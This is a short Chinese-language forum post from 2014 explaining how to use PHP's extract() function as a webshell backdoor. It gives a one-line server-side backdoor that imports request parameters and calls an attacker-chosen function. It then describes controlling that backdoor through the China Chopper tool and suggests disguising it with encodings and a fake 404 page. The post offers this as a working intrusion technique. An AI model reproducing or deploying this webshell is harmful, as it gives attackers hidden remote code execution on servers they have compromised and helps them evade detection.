ODOR1–PHP extract 后门使用方法
PHP extract 函数后门 <br />Auth:winger <br />Date: 2014-02-24 <br />今天介绍的是一种新的PHP后门: extract 函数后门.<br /><br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode114"><br />extract<br />(PHP 4, PHP 5)<br />extract — 从数组中将变量导入到当前的符号表<br />int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )<br />本函数用来将变量从数组中导入到当前的符号表中.<br /></div><br /><br />具体应用: <br /><br />1: PHP中extract函数各种用法介绍 <br />2: PHP extract() 函数 <br />3: 官方文档 <br />4: php-backdoors-hidden-with-clever-use-of-extract-function <br />接下来操刀上马:) <br />服务端代码: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode115"><br /><?@extract($_REQUEST);@die($err($info));?><br /></div><br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201608/20160822210545.jpeg" /><br /><br />菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容: <br /><img alt="" src="https://img.jbzj.com/file_images/article/201608/20160822210546.jpeg" /><br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201608/20160822210547.png" /><br />最后加上各种编码,标签和404....你懂得( ‵▽′)ψ<br />
頁:
[1]